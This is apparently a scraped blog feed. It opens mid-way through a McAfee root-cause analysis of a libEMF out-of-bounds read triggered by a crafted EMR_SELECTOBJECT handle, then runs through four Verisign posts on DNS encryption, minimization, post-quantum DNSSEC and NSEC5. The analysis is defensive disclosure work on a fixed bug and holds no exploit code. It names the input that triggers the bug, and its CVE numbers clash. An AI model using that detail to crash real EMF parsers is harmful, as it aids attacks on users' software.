The information provided by the ASAN was sufficient to reproduce the vulnerability crash outside of the fuzzer. From the ASAN information, the vulnerability appeared to be a null pointer dereference, but this was not the actual root cause, as we will discuss below.

Looking at the call stack, it appears that the application crashed while dynamically casting the object, for which there could be multiple reasons. Out of those possible reasons that seem likely, either the application attempted to access the non-existent virtual table pointer, or the object address returned from the function was a wild address accessed when the application crashed. Getting more context about this crash, we came across an interesting register value while debugging. Below shows the crash point in the disassembly indicating the non-existent memory access.

If we look at the state of the registers at the crash point, it is particularly interesting to note that the register rdi has an unusual value of 0xbebebebebebebebe. We wanted to dig a little deeper to check out how this value got into the register, resulting in the wild memory access. Since we had the source of the library, we could check right away what this register meant in terms of accessing the objects in memory.

Referring to the Address Sanitizer documentation, it turns out that the ASAN writes 0xbe to the newly allocated memory by default, essentially meaning this 64-bit value was written but the memory was not initialized. The ASAN calls this as the malloc_fill_byte. It also does the same by filling the memory with the free_fill_byte when it is freed. This eventually helps identify memory access errors.

This nature of the ASAN can also be verified in the libsanitizer source here. Below is an excerpt from the source file.

Looking at the stack trace at the crash point as shown below, the crash occurred in the SelectObject() function. This part of the code is responsible for processing the EMR_SELECTOBJECT record structure of the Enhanced Meta File (EMF) file and the graphics object handle passed to the function is 0x80000018. We want to investigate the flow of the code to check if this is something which comes directly from the input EMF file and can be controlled by an attacker.

In the SelectObject() function, while processing the EMR_SELECTOBJECT record structure, the handle to the GDI object is passed to GlobalObjects.find() as shown in the above code snippet, which in turn accesses the global stock object vector by masking the higher order bit from the GDI object handle and converting it into the index, eventually returning the stock object reference from the object vector using the converted index number. Stock object enumeration specifies the indexes of predefined logical graphics objects that can be used in graphics operations documented in the MS documentation. For instance, if the object handle is 0x8000018, this will be ANDed with 0x7FFFFFFF, resulting in 0x18, which will be used as the index to the global stock object vector. This stock object reference is then dynamically cast into the graphics object, following which EMF::GRAPHICSOBJECT member function getType ( ) is called to determine the type of the graphics object and then, later in this function, it is again cast into an appropriate graphics object (BRUSH, PEN, FONT, PALETTE, EXTPEN), as shown in the below code snippet.

EMF::GRAPHICSOBJECT is the class derived from EMF::OBJECT and the inheritance diagram of the EMF::OBJECT class is as shown below.

However, as mentioned earlier, we were interested in knowing if the object handle, passed as an argument to the SelectObject function, can controlled by an attacker. To be able to get context on this, let us look at the format of the EMR_SELECTOBJECT record as shown below.

As we notice here, ihObject is the 4-byte unsigned integer specifying the index to the stock object enumeration. In this case the stock object references are maintained in the global objects vector. Here, the object handle of 0x80000018 implies that index 0x18 will be used to access the global stock object vector. If, during this time, the length of the object vector is less then 0x18 and the length check is not done prior to accessing the object vector, it will result in out of bounds memory access.

Below is the visual representation of processing the EMR_SELECTOBJECT metafile record.

While debugging this issue, we enable a break point at GlobalObjects.find () and continue until we have object handle 0x80000018; essentially, we reach the point where the above highlighted EMR_SELECTOBJECT record is being processed. As shown below, the object handle is converted into the index (0x18 = 24) to access the object vector of size (0x16 = 22), resulting into out of bounds access, which we reported as CVE-2020-11865.

Further stepping into the code, it enters the STL vector library stl_vector.h which implements the dynamic expansion of the std::vectors. Since the objects vector at this point of time has only 22 elements, the STL vector will expand the vector to the size indicated by the parameter highlighted, accessing the vector by passed index, and will return the value at that object reference, as shown in the below code snippet, which comes out to be 0xbebebebebebebebe as filled by the ASAN.

 

The code uses the std:allocator to manage the vector memory primarily used for memory allocation and deallocation. On further analysis, it turns out that the value returned, 0xbebebebebebebebe in this case, is the virtual pointer of the non-existent stock object, which is dereferenced during dynamic casting, resulting in a crash.

As mentioned in our earlier blog, the fixes to the library have been released in a subsequent version, available here.

Conclusion

While using third party code in products certainly saves time and increases development speed, it potentially comes with an increase in the volume of vulnerabilities, especially when the code remains unaudited and integrated into products without any testing. It is extremely critical to perform fuzz testing of the open source libraries used, which can help in discovering vulnerabilities earlier in the development cycle and provides an opportunity to fix them before the product is shipped, consequently mitigating attacks. However, as we emphasized in our previous blog, it is critical to strengthen the collaboration between vulnerability researchers and the open source community to continue responsible disclosures, allowing the maintainers of the code to address them in a timely fashion.

The post Vulnerability Discovery in Open Source Libraries: Analyzing CVE-2020-11863 appeared first on McAfee Blogs.

Information Protection for the Domain Name System: Encryption and Minimization

By Burt Kaliski

This is the final in a multi-part series on cryptography and the Domain Name System (DNS).

In previous posts in this series, I’ve discussed a number of applications of cryptography to the DNS, many of them related to the Domain Name System Security Extensions (DNSSEC).

In this final blog post, I’ll turn attention to another application that may appear at first to be the most natural, though as it turns out, may not always be the most necessary: DNS encryption. (I’ve also written about DNS encryption as well as minimization in a separate post on DNS information protection.)

DNS Encryption

In 2014, the Internet Engineering Task Force (IETF) chartered the DNS PRIVate Exchange (dprive) working group to start work on encrypting DNS queries and responses exchanged between clients and resolvers.

That work resulted in RFC 7858, published in 2016, which describes how to run the DNS protocol over the Transport Layer Security (TLS) protocol, also known as DNS over TLS, or DoT.

DNS encryption between clients and resolvers has since gained further momentum, with multiple browsers and resolvers supporting DNS over Hypertext Transport Protocol Security (HTTPS), or DoH, with the formation of the Encrypted DNS Deployment Initiative, and with further enhancements such as oblivious DoH.

The dprive working group turned its attention to the resolver-to-authoritative exchange during its rechartering in 2018. And in October of last year, ICANN’s Office of the CTO published its strategy recommendations for the ICANN-managed Root Server (IMRS, i.e., the L-Root Server), an effort motivated in part by concern about potential “confidentiality attacks” on the resolver-to-root connection.

From a cryptographer’s perspective the prospect of adding encryption to the DNS protocol is naturally quite interesting. But this perspective isn’t the only one that matters, as I’ve observed numerous times in previous posts.

Balancing Cryptographic and Operational Considerations

A common theme in this series on cryptography and the DNS has been the question of whether the benefits of a technology are sufficient to justify its cost and complexity.

This question came up not only in my review of two newer cryptographic advances, but also in my remarks on the motivation for two established tools for providing evidence that a domain name doesn’t exist.

Recall that the two tools — the Next Secure (NSEC) and Next Secure 3 (NSEC3) records — were developed because a simpler approach didn’t have an acceptable risk / benefit tradeoff. In the simpler approach, to provide a relying party assurance that a domain name doesn’t exist, a name server would return a response, signed with its private key, “<name> doesn’t exist.”

From a cryptographic perspective, the simpler approach would meet its goal: a relying party could then validate the response with the corresponding public key. However, the approach would introduce new operational risks, because the name server would now have to perform online cryptographic operations.

The name server would not only have to protect its private key from compromise, but would also have to protect the cryptographic operations from overuse by attackers. That could open another avenue for denial-of-service attacks that could prevent the name server from responding to legitimate requests.

The designers of DNSSEC mitigated these operational risks by developing NSEC and NSEC3, which gave the option of moving the private key and the cryptographic operations offline, into the name server’s provisioning system. Cryptography and operations were balanced by this better solution. The theme is now returning to view through the recent efforts around DNS encryption.

Like the simpler initial approach for authentication, DNS encryption may meet its goal from a cryptographic perspective. But the operational perspective is important as well. As designers again consider where and how to deploy private keys and cryptographic operations across the DNS ecosystem, alternatives with a better balance are a desirable goal.

Minimization Techniques

In addition to encryption, there has been research into other, possibly lower-risk alternatives that can be used in place of or in addition to encryption at various levels of the DNS.

We call these techniques collectively minimization techniques.

Qname Minimization

In “textbook” DNS resolution, a resolver sends the same full domain name to a root server, a top-level domain (TLD) server, a second-level domain (SLD) server, and any other server in the chain of referrals, until it ultimately receives an authoritative answer to a DNS query.

This is the way that DNS resolution has been practiced for decades, and it’s also one of the reasons for the recent interest in protecting information on the resolver-to-authoritative exchange: The full domain name is more information than all but the last name server needs to know.

One such minimization technique, known as qname minimization, was identified by Verisign researchers in 2011 and documented in RFC 7816 in 2016. (In 2015, Verisign announced a royalty-free license to its qname minimization patents.)

With qname minimization, instead of sending the full domain name to each name server, the resolver sends only as much as the name server needs either to answer the query or to refer the resolver to a name server at the next level. This follows the principle of minimum disclosure: the resolver sends only as much information as the name server needs to “do its job.” As Matt Thomas described in his recent blog post on the topic, nearly half of all .com and .net queries received by Verisign’s .com TLD servers were in a minimized form as of August 2020.

Additional Minimization Techniques

Other techniques that are part of this new chapter in DNS protocol evolution include NXDOMAIN cut processing [RFC 8020] and aggressive DNSSEC caching [RFC 8198]. Both leverage information present in the DNS to reduce the amount and sensitivity of DNS information exchanged with authoritative name servers. In aggressive DNSSEC caching, for example, the resolver analyzes NSEC and NSEC3 range proofs obtained in response to previous queries to determine on its own whether a domain name doesn’t exist. This means that the resolver doesn’t always have to ask the authoritative server system about a domain name it hasn’t seen before.

All of these techniques, as well as additional minimization alternatives I haven’t mentioned, have one important common characteristic: they only change how the resolver operates during the resolver-authoritative exchange. They have no impact on the authoritative name server or on other parties during the exchange itself. They thereby mitigate disclosure risk while also minimizing operational risk.

The resolver’s exchanges with authoritative name servers, prior to minimization, were already relatively less sensitive because they represented aggregate interests of the resolver’s many clients1. Minimization techniques lower the sensitivity even further at the root and TLD levels: the resolver sends only its aggregate interests in TLDs to root servers, and only its interests in SLDs to TLD servers. The resolver still sends the aggregate interests in full domain names at the SLD level and below2, and may also include certain client-related information at these levels, such as the client-subnet extension. The lower levels therefore may have different protection objectives than the upper levels.

Conclusion

Minimization techniques and encryption together give DNS designers additional tools for protecting DNS information — tools that when deployed carefully can balance between cryptographic and operational perspectives.

These tools complement those I’ve described in previous posts in this series. Some have already been deployed at scale, such as a DNSSEC with its NSEC and NSEC3 non-existence proofs. Others are at various earlier stages, like NSEC5 and tokenized queries, and still others contemplate “post-quantum” scenarios and how to address them. (And there are yet other tools that I haven’t covered in this series, such as authenticated resolution and adaptive resolution.)

Modern cryptography is just about as old as the DNS. Both have matured since their introduction in the late 1970s and early 1980s respectively. Both bring fundamental capabilities to our connected world. Both continue to evolve to support new applications and to meet new security objectives. While they’ve often moved forward separately, as this blog series has shown, there are also opportunities for them to advance together. I look forward to sharing more insights from Verisign’s research in future blog posts.

Read the complete six blog series:

  1. The Domain Name System: A Cryptographer’s Perspective
  2. Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3
  3. Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries
  4. Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon
  5. Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys
  6. Information Protection for the Domain Name System: Encryption and Minimization

1. This argument obviously holds more weight for large resolvers than for small ones — and doesn’t apply for the less common case of individual clients running their own resolvers. However, small resolvers and individual clients seeking additional protection retain the option of sending sensitive queries through a large, trusted resolver, or through a privacy-enhancing proxy. The focus in our discussion is primarily on large resolvers.

2. In namespaces where domain names are registered at the SLD level, i.e., under an effective TLD, the statements in this note about “root and TLD” and “SLD level and below” should be “root through effective TLD” and “below effective TLD level.” For simplicity, I’ve placed the “zone cut” between TLD and SLD in this note.

Minimization et al. techniques and encryption together give DNS designers additional tools for protecting DNS information — tools that when deployed carefully can balance between cryptographic and operational perspectives.

The post Information Protection for the Domain Name System: Encryption and Minimization appeared first on Verisign Blog.

Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys

By Burt Kaliski

This is the fifth in a multi-part series on cryptography and the Domain Name System (DNS).

In my last article, I described efforts underway to standardize new cryptographic algorithms that are designed to be less vulnerable to potential future advances in quantum computing. I also reviewed operational challenges to be considered when adding new algorithms to the DNS Security Extensions (DNSSEC).

In this post, I’ll look at hash-based signatures, a family of post-quantum algorithms that could be a good match for DNSSEC from the perspective of infrastructure stability.

I’ll also describe Verisign Labs research into a new concept called synthesized zone signing keys that could mitigate the impact of the large signature size for hash-based signatures, while still maintaining this family’s protections against quantum computing.

(Caveat: The concepts reviewed in this post are part of Verisign’s long-term research program and do not necessarily represent Verisign’s plans or positions on new products or services. Concepts developed in our research program may be subject to U.S. and/or international patents and/or patent applications.)

A Stable Algorithm Rollover

The DNS community’s root key signing key (KSK) rollover illustrates how complicated a change to DNSSEC infrastructure can be. Although successfully accomplished, this change was delayed by ICANN to ensure that enough resolvers had the public key required to validate signatures generated with the new root KSK private key.

Now imagine the complications if the DNS community also had to ensure that enough resolvers not only had a new key but also had a brand-new algorithm.

Imagine further what might happen if a weakness in this new algorithm were to be found after it was deployed. While there are procedures for emergency key rollovers, emergency algorithm rollovers would be more complicated, and perhaps controversial as well if a clear successor algorithm were not available.

I’m not suggesting that any of the post-quantum algorithms that might be standardized by NIST will be found to have a weakness. But confidence in cryptographic algorithms can be gained and lost over many years, sometimes decades.

From the perspective of infrastructure stability, therefore, it may make sense for DNSSEC to have a backup post-quantum algorithm built in from the start — one for which cryptographers already have significant confidence and experience. This algorithm might not be as efficient as other candidates, but there is less of a chance that it would ever need to be changed. This means that the more efficient candidates could be deployed in DNSSEC with the confidence that they have a stable fallback. It’s also important to keep in mind that the prospect of quantum computing is not the only reason system developers need to be considering new algorithms from time to time. As public-key cryptography pioneer Martin Hellman wisely cautioned, new classical (non-quantum) attacks could also emerge, whether or not a quantum computer is realized.

Hash-Based Signatures

The 1970s were a foundational time for public-key cryptography, producing not only the RSA algorithm and the Diffie-Hellman algorithm (which also provided the basic model for elliptic curve cryptography), but also hash-based signatures, invented in 1979 by another public-key cryptography founder, Ralph Merkle.

Hash-based signatures are interesting because their security depends only on the security of an underlying hash function.

It turns out that hash functions, as a concept, hold up very well against quantum computing advances — much better than currently established public-key algorithms do.

This means that Merkle’s hash-based signatures, now more than 40 years old, can rightly be considered the oldest post-quantum digital signature algorithm.

If it turns out that an individual hash function doesn’t hold up — whether against a quantum computer or a classical computer — then the hash function itself can be replaced, as cryptographers have been doing for years. That will likely be easier than changing to an entirely different post-quantum algorithm, especially one that involves very different concepts.

The conceptual stability of hash-based signatures is a reason that interoperable specifications are already being developed for variants of Merkle’s original algorithm. Two approaches are described in RFC 8391, “XMSS: eXtended Merkle Signature Scheme” and RFC 8554, “Leighton-Micali Hash-Based Signatures.” Another approach, SPHINCS+, is an alternate in NIST’s post-quantum project.

Figure 1. Conventional DNSSEC signatures. DNS records are signed with the ZSK private key, and are thereby “chained” to the ZSK public key. The digital signatures may be hash-based signatures.
Figure 1. Conventional DNSSEC signatures. DNS records are signed with the ZSK private key, and are thereby “chained” to the ZSK public key. The digital signatures may be hash-based signatures.

Hash-based signatures can potentially be applied to any part of the DNSSEC trust chain. For example, in Figure 1, the DNS record sets can be signed with a zone signing key (ZSK) that employs a hash-based signature algorithm.

The main challenge with hash-based signatures is that the signature size is large, on the order of tens or even hundreds of thousands of bits. This is perhaps why they haven’t seen significant adoption in security protocols over the past four decades.

Synthesizing ZSKs with Merkle Trees

Verisign Labs has been exploring how to mitigate the size impact of hash-based signatures on DNSSEC, while still basing security on hash functions only in the interest of stable post-quantum protections.

One of the ideas we’ve come up with uses another of Merkle’s foundational contributions: Merkle trees.

Merkle trees authenticate multiple records by hashing them together in a tree structure. The records are the “leaves” of the tree. Pairs of leaves are hashed together to form a branch, then pairs of branches are hashed together to form a larger branch, and so on. The hash of the largest branches is the tree’s “root.” (This is a data-structure root, unrelated to the DNS root.)

Each individual leaf of a Merkle tree can be authenticated by retracing the “path” from the leaf to the root. The path consists of the hashes of each of the adjacent branches encountered along the way.

Authentication paths can be much shorter than typical hash-based signatures. For instance, with a tree depth of 20 and a 256-bit hash value, the authentication path for a leaf would only be 5,120 bits long, yet a single tree could authenticate more than a million leaves.

Figure 2. DNSSEC signatures following the synthesized ZSK approach proposed here. DNS records are hashed together into a Merkle tree. The root of the Merkle tree is published as the ZSK, and the authentication path through the Merkle tree is the record’s signature.
Figure 2. DNSSEC signatures following the synthesized ZSK approach proposed here. DNS records are hashed together into a Merkle tree. The root of the Merkle tree is published as the ZSK, and the authentication path through the Merkle tree is the record’s signature.

Returning to the example above, suppose that instead of signing each DNS record set with a hash-based signature, each record set were considered a leaf of a Merkle tree. Suppose further that the root of this tree were to be published as the ZSK public key (see Figure 2). The authentication path to the leaf could then serve as the record set’s signature.

The validation logic at a resolver would be the same as in ordinary DNSSEC:

  • The resolver would obtain the ZSK public key from a DNSKEY record set signed by the KSK.
  • The resolver would then validate the signature on the record set of interest with the ZSK public key.

The only difference on the resolver’s side would be that signature validation would involve retracing the authentication path to the ZSK public key, rather than a conventional signature validation operation.

The ZSK public key produced by the Merkle tree approach would be a “synthesized” public key, in that it is obtained from the records being signed. This is noteworthy from a cryptographer’s perspective, because the public key wouldn’t have a corresponding private key, yet the DNS records would still, in effect, be “signed by the ZSK!”

Additional Design Considerations

In this type of DNSSEC implementation, the Merkle tree approach only applies to the ZSK level. Hash-based signatures would still be applied at the KSK level, although their overhead would now be “amortized” across all records in the zone.

In addition, each new ZSK would need to be signed “on demand,” rather than in advance, as in current operational practice.

This leads to tradeoffs, such as how many changes to accumulate before constructing and publishing a new tree. Fewer changes and the tree will be available sooner. More changes and the tree will be larger, so the per-record overhead of the signatures at the KSK level will be lower.

Conclusion

My last few posts have discussed cryptographic techniques that could potentially be applied to the DNS in the long term — or that might not even be applied at all. In my next post, I’ll return to more conventional subjects, and explain how Verisign sees cryptography fitting into the DNS today, as well as some important non-cryptographic techniques that are part of our vision for a secure, stable and resilient DNS.

Read the complete six blog series:

  1. The Domain Name System: A Cryptographer’s Perspective
  2. Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3
  3. Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries
  4. Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon
  5. Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys
  6. Information Protection for the Domain Name System: Encryption and Minimization
Research into concepts such as hash-based signatures and synthesized zone signing keys indicates that these techniques have the potential to keep the Domain Name System (DNS) secure for the long term if added into the Domain Name System Security Extensions (DNSSEC).

The post Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys appeared first on Verisign Blog.

Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon

By Burt Kaliski

This is the fourth in a multi-part series on cryptography and the Domain Name System (DNS).

One of the “key” questions cryptographers have been asking for the past decade or more is what to do about the potential future development of a large-scale quantum computer.

If theory holds, a quantum computer could break established public-key algorithms including RSA and elliptic curve cryptography (ECC), building on Peter Shor’s groundbreaking result from 1994.

This prospect has motivated research into new so-called “post-quantum” algorithms that are less vulnerable to quantum computing advances. These algorithms, once standardized, may well be added into the Domain Name System Security Extensions (DNSSEC) — thus also adding another dimension to a cryptographer’s perspective on the DNS.

(Caveat: Once again, the concepts I’m discussing in this post are topics we’re studying in our long-term research program as we evaluate potential future applications of technology. They do not necessarily represent Verisign’s plans or position on possible new products or services.)

Post-Quantum Algorithms

The National Institute of Standards and Technology (NIST) started a Post-Quantum Cryptography project in 2016 to “specify one or more additional unclassified, publicly disclosed digital signature, public-key encryption, and key-establishment algorithms that are capable of protecting sensitive government information well into the foreseeable future, including after the advent of quantum computers.”

Security protocols that NIST is targeting for these algorithms, according to its 2019 status report (Section 2.2.1), include: “Transport Layer Security (TLS), Secure Shell (SSH), Internet Key Exchange (IKE), Internet Protocol Security (IPsec), and Domain Name System Security Extensions (DNSSEC).”

The project is now in its third round, with seven finalists, including three digital signature algorithms, and eight alternates.

NIST’s project timeline anticipates that the draft standards for the new post-quantum algorithms will be available between 2022 and 2024.

It will likely take several additional years for standards bodies such as the Internet Engineering Task (IETF) to incorporate the new algorithms into security protocols. Broad deployments of the upgraded protocols will likely take several years more.

Post-quantum algorithms can therefore be considered a long-term issue, not a near-term one. However, as with other long-term research, it’s appropriate to draw attention to factors that need to be taken into account well ahead of time.

DNSSEC Operational Considerations

The three candidate digital signature algorithms in NIST’s third round have one common characteristic: all of them have a key size or signature size (or both) that is much larger than for current algorithms.

Key and signature sizes are important operational considerations for DNSSEC because most of the DNS traffic exchanged with authoritative data servers is sent and received via the User Datagram Protocol (UDP), which has a limited response size.

Response size concerns were evident during the expansion of the root zone signing key (ZSK) from 1024-bit to 2048-bit RSA in 2016, and in the rollover of the root key signing key (KSK) in 2018. In the latter case, although the signature and key sizes didn’t change, total response size was still an issue because responses during the rollover sometimes carried as many as four keys rather than the usual two.

Thanks to careful design and implementation, response sizes during these transitions generally stayed within typical UDP limits. Equally important, response sizes also appeared to have stayed within the Maximum Transmission Unit (MTU) of most networks involved, thereby also avoiding the risk of packet fragmentation. (You can check how well your network handles various DNSSEC response sizes with this tool developed by Verisign Labs.)

Modeling Assumptions

The larger sizes associated with certain post-quantum algorithms do not appear to be a significant issue either for TLS, according to one benchmarking study, or for public-key infrastructures, according to another report. However, a recently published study of post-quantum algorithms and DNSSEC observes that “DNSSEC is particularly challenging to transition” to the new algorithms.

Verisign Labs offers the following observations about DNSSEC-related queries that may help researchers to model DNSSEC impact:

A typical resolver that implements both DNSSEC validation and qname minimization will send a combination of queries to Verisign’s root and top-level domain (TLD) servers.

Because the resolver is a validating resolver, these queries will all have the “DNSSEC OK” bit set, indicating that the resolver wants the DNSSEC signatures on the records.

The content of typical responses by Verisign’s root and TLD servers to these queries are given in Table 1 below. (In the table, <SLD>.<TLD> are the final two labels of a domain name of interest, including the TLD and the second-level domain (SLD); record types involved include A, Name Server (NS), and DNSKEY.)

Name Server Resolver Query Scenario Typical Response Content from Verisign’s Servers
Root DNSKEY record set for root zone • DNSKEY record set including root KSK RSA-2048 public key and root ZSK RSA-2048 public key
• Root KSK RSA-2048 signature on DNSKEY record set
A or NS record set for <TLD> — when <TLD> exists • NS referral to <TLD> name server
• DS record set for <TLD> zone
• Root ZSK RSA-2048 signature on DS record set
A or NS record set for <TLD> — when <TLD> doesn’t exist • Up to two NSEC records for non-existence of <TLD>
• Root ZSK RSA-2048 signatures on NSEC records
.com / .net DNSKEY record set for <TLD> zone • DNSKEY record set including <TLD> KSK RSA-2048 public key and <TLD> ZSK RSA-1280 public key
• <TLD> KSK RSA-2048 signature on DNSKEY record set
A or NS record set for <SLD>.<TLD> — when <SLD>.<TLD> exists • NS referral to <SLD>.<TLD> name server
• DS record set for <SLD>.<TLD> zone (if <SLD>.<TLD> supports DNSSEC)
• <TLD> ZSK RSA-1280 signature on DS record set (if present)
A or NS record set for <SLD>.<TLD> — when <SLD>.<TLD> doesn’t exist • Up to three NSEC3 records for non-existence of <SLD>.<TLD>
• <TLD> ZSK RSA-1280 signatures on NSEC3 records
Table 1. Combination of queries that may be sent to Verisign’s root and TLD servers by a typical resolver that implements both DNSSEC validation and qname minimization, and content of associated responses.


For an A or NS query, the typical response, when the domain of interest exists, includes a referral to another name server. If the domain supports DNSSEC, the response also includes a set of Delegation Signer (DS) records providing the hashes of each of the referred zone’s KSKs — the next link in the DNSSEC trust chain. When the domain of interest doesn’t exist, the response includes one or more Next Secure (NSEC) or Next Secure 3 (NSEC3) records.

Researchers can estimate the effect of post-quantum algorithms on response size by replacing the sizes of the various RSA keys and signatures with those for their post-quantum counterparts. As discussed above, it is important to keep in mind that the number of keys returned may be larger during key rollovers.

Most of the queries from qname-minimizing, validating resolvers to the root and TLD name servers will be for A or NS records (the choice depends on the implementation of qname minimization, and has recently trended toward A). The signature size for a post-quantum algorithm, which affects all DNSSEC-related responses, will therefore generally have a much larger impact on average response size than will the key size, which affects only the DNSKEY responses.

Conclusion

Post-quantum algorithms are among the newest developments in cryptography. They add another dimension to a cryptographer’s perspective on the DNS because of the possibility that these algorithms, or other variants, may be added to DNSSEC in the long term.

In my next post, I’ll make the case for why the oldest post-quantum algorithm, hash-based signatures, could be a particularly good match for DNSSEC. I’ll also share the results of some research at Verisign Labs into how the large signature sizes of hash-based signatures could potentially be overcome.

Read the complete six blog series:

  1. The Domain Name System: A Cryptographer’s Perspective
  2. Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3
  3. Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries
  4. Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon
  5. Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys
  6. Information Protection for the Domain Name System: Encryption and Minimization
Post-quantum algorithms are among the newest developments in cryptography. When standardized, they could eventually be added into the Domain Name System Security Extensions (DNSSEC) to help keep the DNS secure for the long term.

The post Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon appeared first on Verisign Blog.

Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries

By Burt Kaliski

This is the third in a multi-part blog series on cryptography and the Domain Name System (DNS).

In my last post, I looked at what happens when a DNS query renders a “negative” response – i.e., when a domain name doesn’t exist. I then examined two cryptographic approaches to handling negative responses: NSEC and NSEC3. In this post, I will examine a third approach, NSEC5, and a related concept that protects client information, tokenized queries.

The concepts I discuss below are topics we’ve studied in our long-term research program as we evaluate new technologies. They do not necessarily represent Verisign’s plans or position on a new product or service. Concepts developed in our research program may be subject to U.S. and international patents and patent applications.

NSEC5

NSEC5 is a result of research by cryptographers at Boston University and the Weizmann Institute. In this approach, which is still in an experimental stage, the endpoints are the outputs of a verifiable random function (VRF), a cryptographic primitive that has been gaining interest in recent years. NSEC5 is documented in an Internet Draft (currently expired) and in several research papers.

A VRF is like a hash function but with two important differences:

  1. In addition to a message input, a VRF has a second input, a private key. (As in public-key cryptography, there’s also a corresponding public key.) No one can compute the outputs without the private key, hence the “random.”
  2. A VRF has two outputs: a token and a proof. (I’ve adopted the term “token” for alignment with the research that I describe next. NSEC5 itself simply uses “hash.”) Anyone can check that the token is correct given the proof and the public key, hence the “verifiable.”

So, it’s not only hard for an adversary to reverse the VRF – which is also a property the hash function has – but it’s also hard for the adversary to compute the VRF in the forward direction, thus preventing dictionary attacks. And yet a relying party can still confirm that the VRF output for a given input is correct, because of the proof.

How does this work in practice? As in NSEC and NSEC3, range statements are prepared in advance and signed with the zone signing key (ZSK). With NSEC5, however, the range endpoints are two consecutive tokens.

When a domain name doesn’t exist, the name server applies the VRF to the domain name to obtain a token and a proof. The name sever then returns a range statement where the token falls within the range, as well as the proof, as shown in the figure below. Note that the token values are for illustration only.

Figure 1. An example of a NSEC5 proof of non-existence based on a verifiable random function.
Figure 1. An example of a NSEC5 proof of non-existence based on a verifiable random function.

Because the range statement reveals only tokenized versions of other domain names in a zone, an adversary who doesn’t know the private key doesn’t learn any new existing domain names from the response. Indeed, to find out which domain name corresponds to one of the tokenized endpoints, the adversary would need access to the VRF itself to see if a candidate domain name has a matching hash value, which would involve an online dictionary attack. This significantly reduces disclosure risk.

The name server needs a copy of the zone’s NSEC5 private key so that it can generate proofs for non-existent domain names. The ZSK itself can stay in the provisioning system. As the designers of NSEC5 have pointed out, if the NSEC5 private key does happen to be compromised, this only makes it possible to do a dictionary attack offline— not to generate signatures on new range statements, or on new positive responses.

NSEC5 is interesting from a cryptographer’s perspective because it uses a less common cryptographic technique, a VRF, to achieve a design goal that was at best partially met by previous approaches. As with other new technologies, DNS operators will need to consider whether NSEC5’s benefits are sufficient to justify its cost and complexity. Verisign doesn’t have any plans to implement NSEC5, as we consider NSEC and NSEC3 adequate for the name servers we currently operate. However, we will continue to track NSEC5 and related developments as part of our long-term research program.

Tokenized Queries

A few years before NSEC5 was published, Verisign Labs had started some research on an opposite application of tokenization to the DNS, to protect a client’s information from disclosure.

In our approach, instead of asking the resolver “What is <name>’s IP address,” the client would ask “What is token 3141…’s IP address,” where 3141… is the tokenization of <name>.

(More precisely, the client would specify both the token and the parent zone that the token relates to, e.g., the TLD of the domain name. Only the portion of the domain name below the parent would be obscured, just as in NSEC5. I’ve omitted the zone information for simplicity in this discussion.)

Suppose now that the domain name corresponding to token 3141… does exist. Then the resolver would respond with the domain name’s IP address as usual, as shown in the next figure.

Figure 2. Tokenized queries
Figure 2. Tokenized queries.

In this case, the resolver would know that the domain name associated with the token does exist, because it would have a mapping between the token and the DNS record, i.e., the IP address. Thus, the resolver would effectively “know” the domain name as well for practical purposes. (We’ve developed another approach that can protect both the domain name and the DNS record from disclosure to the resolver in this case, but that’s perhaps a topic for another post.)

Now, consider a domain name that doesn’t exist and suppose that its token is 2718… .

In this case, the resolver would respond that the domain name doesn’t exist, as usual, as shown below.

Figure 3. Non-existence with tokenized queries
Figure 3. Non-existence with tokenized queries.

But because the domain name is tokenized and no other information about the domain name is returned, the resolver would only learn the token 2718… (and the parent zone), not the actual domain name that the client is interested in.

The resolver could potentially know that the name doesn’t exist via a range statement from the parent zone, as in NSEC5.

How does the client tokenize the domain name, if it doesn’t have the private key for the VRF? The name server would offer a public interface to the tokenization function. This can be done in what cryptographers call an “oblivious” VRF protocol, where the name server doesn’t see the actual domain name during the protocol, yet the client still gets the token.

To keep the resolver itself from using this interface to do an online dictionary attack that matches candidate domain names with tokens, the name server could rate-limit access, or restrict it only to authorized requesters.

Additional details on this technology may be found in U.S. Patent 9,202,079B2, entitled “Privacy preserving data querying,” and related patents.

It’s interesting from a cryptographer’s perspective that there’s a way for a client to find out whether a DNS record exists, without necessarily revealing the domain name of interest. However, as before, the benefits of this new technology will be weighed against its operational cost and complexity and compared to other approaches. Because this technique focuses on client-to-resolver interactions, it’s already one step removed from the name servers that Verisign currently operates, so it is not as relevant to our business today in a way it might have been when we started the research. This one will stay under our long-term tracking as well.

Conclusion

The examples I’ve shared in these last two blog posts make it clear that cryptography has the potential to bring interesting new capabilities to the DNS. While the particular examples I’ve shared here do not meet the criteria for our product roadmap, researching advances in cryptography and other techniques remains important because new events can sometimes change the calculus. That point will become even more evident in my next post, where I’ll consider the kinds of cryptography that may be needed in the event that one or more of today’s algorithms is compromised, possibly through the introduction of a quantum computer.

Read the complete six blog series:

  1. The Domain Name System: A Cryptographer’s Perspective
  2. Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3
  3. Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries
  4. Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon
  5. Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys
  6. Information Protection for the Domain Name System: Encryption and Minimization

The post Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries appeared first on Verisign Blog.

Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3

